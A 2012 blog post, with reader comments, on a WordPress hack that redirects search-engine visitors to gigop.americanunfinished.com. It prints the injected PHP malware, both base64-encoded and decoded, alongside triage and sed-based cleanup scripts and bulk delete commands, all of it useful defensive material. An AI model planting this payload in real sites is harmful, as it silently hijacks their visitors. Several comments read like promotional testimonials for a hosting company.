
WordPress hacked – Redirect to gigop.americanunfinished.com

March 12, 2012 by Sarath DR in Articles, Featured, Internet with 29 Comments

Even after changing servers I have been hacked several times. I could not find out how the attacker gets into my server and inserts its PHP code into every PHP file there; I checked my file permissions and nothing seemed to be vulnerable. A non-techie could not identify the infection, since it does not affect the normal loading of the website. But when you visit the website as Googlebot it redirects to gigop.americanunfinished.com. If Google Webmaster Tools is enabled for your website, you receive a notification from Google that your website has been removed from its index once it is hacked. Also, if you find the following PHP code in any of the PHP files on your server, you can confirm the attack.

 
<?php eval(base64_decode("DQplcnJvcl9yZXBvcnRpbmcoMCk7DQokcWF6cGxtPWhlYWRlcnNfc2VudCgpOw0KaWYgKCEkcWF6cGxtKXsNCiRyZWZlcmVyPSRfU0VSVkVSWydIVFRQX1JFRkVSRVInXTsNCiR1YWc9JF9TRVJWRVJbJ0hUVFBfVVNFUl9BR0VOVCddOw0KaWYgKCR1YWcpIHsNCmlmICghc3RyaXN0cigkdWFnLCJNU0lFIDcuMCIpKXsKaWYgKHN0cmlzdHIoJHJlZmVyZXIsInlhaG9vIikgb3Igc3RyaXN0cigkcmVmZXJlciwiYmluZyIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsInJhbWJsZXIiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJnb2dvIikgb3Igc3RyaXN0cigkcmVmZXJlciwibGl2ZS5jb20iKW9yIHN0cmlzdHIoJHJlZmVyZXIsImFwb3J0Iikgb3Igc3RyaXN0cigkcmVmZXJlciwibmlnbWEiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJ3ZWJhbHRhIikgb3Igc3RyaXN0cigkcmVmZXJlciwiYmVndW4ucnUiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJzdHVtYmxldXBvbi5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJiaXQubHkiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJ0aW55dXJsLmNvbSIpIG9yIHByZWdfbWF0Y2goIi95YW5kZXhcLnJ1XC95YW5kc2VhcmNoXD8oLio/KVwmbHJcPS8iLCRyZWZlcmVyKSBvciBwcmVnX21hdGNoICgiL2dvb2dsZVwuKC4qPylcL3VybFw/c2EvIiwkcmVmZXJlcikgb3Igc3RyaXN0cigkcmVmZXJlciwibXlzcGFjZS5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJmYWNlYm9vay5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJhb2wuY29tIikpIHsNCmlmICghc3RyaXN0cigkcmVmZXJlciwiY2FjaGUiKSBvciAhc3RyaXN0cigkcmVmZXJlciwiaW51cmwiKSl7DQpoZWFkZXIoIkxvY2F0aW9uOiBodHRwOi8vZ2lnb3AuYW1lcmljYW51bmZpbmlzaGVkLmNvbS8iKTsNCmV4aXQoKTsNCn0KfQp9DQp9DQp9"));
?>

When you decode the base64 string in the above PHP code you get the following, which is what actually runs on every request:

<?php
// Decoded form of the base64 string above (indentation and comments added).
error_reporting(0);                       // hide any PHP errors the payload itself causes
$qazplm = headers_sent();
if (!$qazplm) {                           // a redirect is only possible before output has started
    $referer = $_SERVER['HTTP_REFERER'];
    $uag     = $_SERVER['HTTP_USER_AGENT'];
    if ($uag) {
        if (!stristr($uag, "MSIE 7.0")) {
            // Only visitors arriving from a search engine, link shortener or social site
            // are redirected; someone typing the URL directly sees the normal page,
            // which is why the site owner does not notice.
            if (stristr($referer, "yahoo") or stristr($referer, "bing") or stristr($referer, "rambler")
                or stristr($referer, "gogo") or stristr($referer, "live.com") or stristr($referer, "aport")
                or stristr($referer, "nigma") or stristr($referer, "webalta") or stristr($referer, "begun.ru")
                or stristr($referer, "stumbleupon.com") or stristr($referer, "bit.ly") or stristr($referer, "tinyurl.com")
                or preg_match("/yandex\.ru\/yandsearch\?(.*?)\&lr\=/", $referer)
                or preg_match("/google\.(.*?)\/url\?sa/", $referer)
                or stristr($referer, "myspace.com") or stristr($referer, "facebook.com") or stristr($referer, "aol.com")) {
                // Only a referer containing both "cache" and "inurl" escapes the redirect
                if (!stristr($referer, "cache") or !stristr($referer, "inurl")) {
                    header("Location: http://gigop.americanunfinished.com/");
                    exit();
                }
            }
        }
    }
}
?>
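Knowing what the payload does is only half of the job; you also need to know which files carry one, and ideally what each variant does, without ever executing it. The script below is an added example, not code from this post or its author: it finds every PHP file that contains an eval(base64_decode("...")) statement, decodes the embedded string offline, and reports which of the behaviours seen above it contains (a Location redirect, a referer check, a user-agent check, error suppression). It assumes GNU coreutils and grep (base64 -d, grep -r --include) and file names without whitespace; the function names are my own.

```shell
#!/bin/sh
# Added example (not from the post): find PHP files carrying an injected
# eval(base64_decode("...")) statement and describe each payload without running it.
# Assumes GNU coreutils and grep (base64 -d, grep -r --include); file names
# are assumed to contain no whitespace.

# Print every base64 literal wrapped in eval(base64_decode("...")) in FILE, one per line.
extract_payloads() {
    grep -o 'eval(base64_decode("[A-Za-z0-9+/=]*"))' "$1" \
        | sed -e 's/^eval(base64_decode("//' -e 's/"))$//'
}

# Decode one base64 payload and print the behaviours found in it, space separated:
#   redirect           sends a Location header (the gigop redirect seen above)
#   referer-check      branches on HTTP_REFERER (search-engine visitors only)
#   ua-check           branches on HTTP_USER_AGENT (skips certain browsers)
#   error-suppression  calls error_reporting(0) to hide failures
# An empty line means none of these were found (or the string did not decode).
describe_payload() {
    decoded=$(printf '%s' "$1" | base64 -d 2>/dev/null | tr -d '\r')
    found=""
    printf '%s\n' "$decoded" | grep -q 'header("Location:'  && found="$found redirect"
    printf '%s\n' "$decoded" | grep -q 'HTTP_REFERER'        && found="$found referer-check"
    printf '%s\n' "$decoded" | grep -q 'HTTP_USER_AGENT'     && found="$found ua-check"
    printf '%s\n' "$decoded" | grep -q 'error_reporting(0)'  && found="$found error-suppression"
    printf '%s\n' "${found# }"
}

# Number of .php files under DIR that contain at least one injected statement.
count_infected() {
    grep -rl --include='*.php' 'eval(base64_decode("' "$1" | wc -l | tr -d ' '
}

# Report each infected file under DIR with the indicators of every payload it carries.
triage_tree() {
    for f in $(grep -rl --include='*.php' 'eval(base64_decode("' "$1"); do
        for p in $(extract_payloads "$f"); do
            printf '%s: %s\n' "$f" "$(describe_payload "$p")"
        done
    done
}

# Usage: ./triage.sh /path/to/webroot
if [ $# -gt 0 ]; then
    triage_tree "$1"
fi
```

Run it from the web root before cleaning anything: the report tells you how many files are affected and whether every payload is the same redirect or whether some file carries something else (a payload with none of these indicators deserves a manual look, since it may be a backdoor rather than the redirect).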

Since I did not have a backup of all my files, I sought help from a friend who works as a sysadmin. He wrote the following shell script to clean the code from all files.

You can follow the steps below to remove the injected code.

Step 1: Copy the code below and save it as "clean.sh"

#!/bin/sh
# clean.sh: strip the injected eval(base64_decode("...")) statement from one PHP file.
# The original file is kept as <file>.hack and the cleaned copy takes its place.

src="$1.hack"
dst="$1"

# keep the infected original as a backup
mv "$dst" "$src"

# write the file back without the injected statement (the literal is the exact base64 string seen above)
sed -e 's,eval(base64_decode("DQplcnJvcl9yZXBvcnRpbmcoMCk7DQokcWF6cGxtPWhlYWRlcnNfc2VudCgpOw0KaWYgKCEkcWF6cGxtKXsNCiRyZWZlcmVyPSRfU0VSVkVSWydIVFRQX1JFRkVSRVInXTsNCiR1YWc9JF9TRVJWRVJbJ0hUVFBfVVNFUl9BR0VOVCddOw0KaWYgKCR1YWcpIHsNCmlmICghc3RyaXN0cigkdWFnLCJNU0lFIDcuMCIpKXsKaWYgKHN0cmlzdHIoJHJlZmVyZXIsInlhaG9vIikgb3Igc3RyaXN0cigkcmVmZXJlciwiYmluZyIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsInJhbWJsZXIiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJnb2dvIikgb3Igc3RyaXN0cigkcmVmZXJlciwibGl2ZS5jb20iKW9yIHN0cmlzdHIoJHJlZmVyZXIsImFwb3J0Iikgb3Igc3RyaXN0cigkcmVmZXJlciwibmlnbWEiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJ3ZWJhbHRhIikgb3Igc3RyaXN0cigkcmVmZXJlciwiYmVndW4ucnUiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJzdHVtYmxldXBvbi5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJiaXQubHkiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJ0aW55dXJsLmNvbSIpIG9yIHByZWdfbWF0Y2goIi95YW5kZXhcLnJ1XC95YW5kc2VhcmNoXD8oLio/KVwmbHJcPS8iLCRyZWZlcmVyKSBvciBwcmVnX21hdGNoICgiL2dvb2dsZVwuKC4qPylcL3VybFw/c2EvIiwkcmVmZXJlcikgb3Igc3RyaXN0cigkcmVmZXJlciwibXlzcGFjZS5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJmYWNlYm9vay5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJhb2wuY29tIikpIHsNCmlmICghc3RyaXN0cigkcmVmZXJlciwiY2FjaGUiKSBvciAhc3RyaXN0cigkcmVmZXJlciwiaW51cmwiKSl7DQpoZWFkZXIoIkxvY2F0aW9uOiBodHRwOi8vZ2lnb3AuYW1lcmljYW51bmZpbmlzaGVkLmNvbS8iKTsNCmV4aXQoKTsNCn0KfQp9DQp9DQp9"));,,g' "$src" > "$dst"

Step 2: Upload "clean.sh" to the root folder and give it write permission
Step 3: Run the following command

find . -name '*.php' -exec ./clean.sh \{\} \;

This removes the code from every .php file and keeps the original with a .php.hack extension.

For example, after running the above script index.php will be clean and index.php.hack will be the old file.

Or you can run the script for a single file first, to make sure that it is working properly:

./clean.sh index.php

Step 4: If everything is fine, run the following command to remove all .php.hack files.

find . -name '*.hack' -exec rm -f \{\} \;
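The script above matches one exact base64 literal, so a variant payload (the comments below report files whose strings differ) is left in place. The following is an added example, not the post's own clean.sh: it generalises the same sed approach to any eval(base64_decode("<base64>")); statement, keeps the .php.hack backup the post describes, counts what it removed, and restores the backup if the pattern somehow survives the substitution. It assumes GNU sed and grep and file names without whitespace; clean_file, clean_tree and remove_backups are names I chose.

```shell
#!/bin/sh
# Added example (not the post's clean.sh): remove any eval(base64_decode("...")); statement
# from PHP files, keeping a .hack backup of each file actually changed.
# Assumes GNU sed and grep; file names are assumed to contain no whitespace.

# Matches the injected statement regardless of which base64 string it carries.
PATTERN='eval(base64_decode("[A-Za-z0-9+/=]*"))'

# Number of injected statements present in FILE (0 if clean).
count_in_file() {
    grep -o "$PATTERN" "$1" | wc -l | tr -d ' '
}

# Clean one FILE in place and print the number of statements removed.
# A clean file is left untouched and gets no backup. If the pattern still
# matches after sed ran, the backup is restored and the function returns 1.
clean_file() {
    f="$1"
    before=$(count_in_file "$f")
    if [ "$before" -eq 0 ]; then
        printf '0\n'
        return 0
    fi
    cp -p "$f" "$f.hack" || return 1
    # Same substitution as the post's clean.sh, with the literal base64 replaced
    # by a character class so every payload variant is matched.
    sed -e "s,${PATTERN};,,g" "$f.hack" > "$f"
    after=$(count_in_file "$f")
    if [ "$after" -ne 0 ]; then
        cp -p "$f.hack" "$f"
        printf '0\n'
        return 1
    fi
    printf '%s\n' "$before"
}

# Clean every .php file under DIR; prints the total number of statements removed.
clean_tree() {
    total=0
    for f in $(grep -rl --include='*.php' 'eval(base64_decode("' "$1"); do
        n=$(clean_file "$f") || n=0
        total=$((total + n))
    done
    printf '%s\n' "$total"
}

# Step 4 of the post: drop the backups once the cleaned site has been checked.
remove_backups() {
    find "$1" -name '*.php.hack' -type f -exec rm -f {} +
}

# Usage: ./clean-all.sh /path/to/webroot
if [ $# -gt 0 ]; then
    clean_tree "$1"
fi
```

Save it as clean-all.sh in the web root, make it executable with chmod +x clean-all.sh, and run ./clean-all.sh . (the count it prints should match what the triage step reported). The substitution leaves an empty <?php ?> block behind, exactly as the post's script does, which is harmless. Only after a spot check shows the site still loads should you call remove_backups . to drop the .php.hack copies, mirroring step 4.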

29 Comments

  1. Jason, Apr 3, 2012 at 2:54 pm

    Thanks so much for posting this. I had the same hack and used your help to fix it. Any idea how they got in?

    • admin (Author), Apr 3, 2012 at 4:36 pm

      No idea, man!! I have made all my files write-protected after that; it might be some old WordPress version security issue.

  2. Thomas, Apr 6, 2012 at 6:57 pm

    When I run the code I get this message:

    find: ./clean.sh: No such file or directory

  3. admin (Author), Apr 6, 2012 at 7:00 pm

    Did you upload the file?

  4. Thomas, Apr 6, 2012 at 7:08 pm

    Yes, I uploaded the file, then I did
    chmod 777 clean.sh

    Then I ran the command you provided in the Root of the server’s SSH.

    • admin (Author), Apr 6, 2012 at 7:11 pm

      Are you running the commands from the same location where the file resides?? Double-check the path.

  5. admin (Author), Apr 6, 2012 at 7:14 pm

    You have to specify the file name you want to clean after ./clean.sh, as in ./clean.sh index.php, if you are trying only a specific file.

  6. Thomas, Apr 6, 2012 at 7:18 pm

    I can show you what I have
    http://gyazo.com/b4abf2c781697f4e523d3c6b3536ec2d

  7. admin (Author), Apr 6, 2012 at 7:26 pm

    Could you create a sample php file and try this command alone: ./clean.sh index.php

  8. admin (Author), Apr 6, 2012 at 7:27 pm

    Or copy the file to public_html folder and try it from there

  9. Cynthia, Apr 9, 2012 at 2:21 am

    This has been happening to me as well. I’ve just deleted WordPress and am reinstalling it. The databases are fine, it’s just the php files. I’ve been running the Bullet Proof Security plugin and changing the permissions of files as it advises (plus all the index php files under the theme directories), and also running the Exploit Scanner plugin, which identifies all the eval code that’s in there.

    I hope that the permissions changes will secure my blogs enough so that they don’t get in again. No idea how they are getting in. It’s totally annoying!

  10. Ira, Apr 19, 2012 at 6:51 pm

    I would suggest that you sign up for an account with theshosting.com. They provide free malware removal services for anybody hosted on their servers. My site was hacked at Bluehost and they were able to transfer it from Bluehost and also remove the malware injection for free!

    They were even able to tell me exactly where the hack originated from as well. They said it came from an outdated timthumb.php file which they were able to update for me.

    They also did a scan of my account and told me all the security vulnerabilities of my account.

    I honestly suggest switching over to them if your website is hacked. They can transfer and remove the hack from your site. Best of all they do this for free.

    • Cynthia, Apr 20, 2012 at 7:34 pm

      Thanks Ira, I will look at them. Do you host there?

      • Ira, Apr 20, 2012 at 7:43 pm

        Yup, I have all my wordpress sites with them now. Bluehost was awful. I literally got hacked like 3 times and they did nothing to help.

  11. ryan64, Apr 24, 2012 at 7:52 pm

    I guess I’m a bit of a newb on this, but can you walk me through how to do step 3, run the command? Where do I put the code?

    • admin (Author), Apr 24, 2012 at 11:19 pm

      You need to put the file in the web root folder to check all infected files, and run the following command from that folder:

      find . -name '*.php' -exec ./clean.sh \{\} \;

  12. alex, Jul 3, 2012 at 6:26 am

    Can somebody explain to me where to put the command lines?
    Thanks

  13. Scott, Jul 4, 2012 at 6:25 pm

    Hey, as per Ira’s suggestion, I switched hosts as well to theshosting.com. I am not very technical so this command stuff isn’t for me. I just wanted to come back with a review.

    After I signed up with them, I requested a transfer from them. They were able to transfer all the content from my previous host. From there they were able to completely remove the malware on my site. Before this, my site was showing the google attack page for 1 month and I was not able to find anybody that could help with this. Now it is completely fine and I didn’t need to do anything. Not only were they able to clean the entire site, they also told me exactly where the intrusion occurred. In my case, they said I had a php shell embedded in a file called 404.php that allowed the intruder to continue to gain access. They were also able to remove this for me as well.

    I contacted them again to find out if they offer this only to new clients or if this is a service they continually provide. It turns out that they assist with this any time it occurs on their servers. This is the guarantee they provided me: “If your account is ever compromised, many times we will notice this even before you will as we are always monitoring the logs for suspicious uploads. If at any time, you believe your account was compromised please contact us as soon as possible so that we may find out what exactly was modified and take steps to secure your account. We will assist with this at any time.”

    They are an awesome host! I highly suggest that you switch over to them especially if your site is infected with malware as they will take care of all of that for you!!

  14. admin (Author), Jul 4, 2012 at 9:07 pm

    Thank you Scott. My 404.php was not cleared; now it’s fine :)

  15. Severe Attacks on Wordpress websites - ertyuiop.itsaol, Jul 27, 2012 at 11:30 am

    [...] can refer my previous post regarding the wordpress hacking here to resolve the issue and for more [...]

  16. JTPratt Media, Aug 15, 2012 at 9:03 pm

    So you removed the hacked code, but did you find the source of the break-in? If not, it could happen again and again. That’s the most common complaint about a hacked WP website: “it keeps happening”.

    We wrote about what to do the other day on our blog:
    jtprattmedia.com/my-wordpress-website-is-still-getting-hacked/

  17. Nathaly, Sep 13, 2012 at 3:54 am

    If you want to stop these attacks, after removing the hack code from all your files you should change all your FTP account passwords. That works for me! :)

  18. Nidhin, Oct 11, 2012 at 10:14 am

    Thanks a lot, it saved my ass.

  19. How to remove malware from Wordpress website? | SkillsYard, Oct 26, 2012 at 11:31 am

    [...] you get the eval base64_decode injection in all PHP files on your hosting, you can use clean.sh script to remove the injected code from all PHP files available on http://tech.sarathdr.com [...]

  20. Iosif, Dec 9, 2012 at 5:54 am

    It is extremely important to find out how they got in. You can remove the code but eventually it will be back, if you don’t close the door.

  21. How to remove malware from WordPress website? - MadGuyyy, Feb 3, 2013 at 12:51 pm

    [...] you get the eval base64_decode injection in all PHP files on your hosting, you can use clean.sh script to remove the injected code from all PHP files available on http://tech.sarathdr.com [...]

  22. How to remove malware from WordPress website? | ScrewDesk, Mar 31, 2013 at 8:28 pm

    [...] you get the eval base64_decode injection in all PHP files on your hosting, you can use clean.sh script to remove the injected code from all PHP files available on http://tech.sarathdr.com [...]

  23. robi, Jul 8, 2014 at 12:54 pm

    Hello,
    I have 10-15 php files with different codes, but all begin with n!

    or

    can I use this one clean.sh for all codes to clean:

    #!/bin/sh

    src=$1.hack
    dst=$1

    mv $dst $src

    sed -e 's,eval(base64_decode("n******"));,,g' $src >
    $dst

    Thank you
    Robi
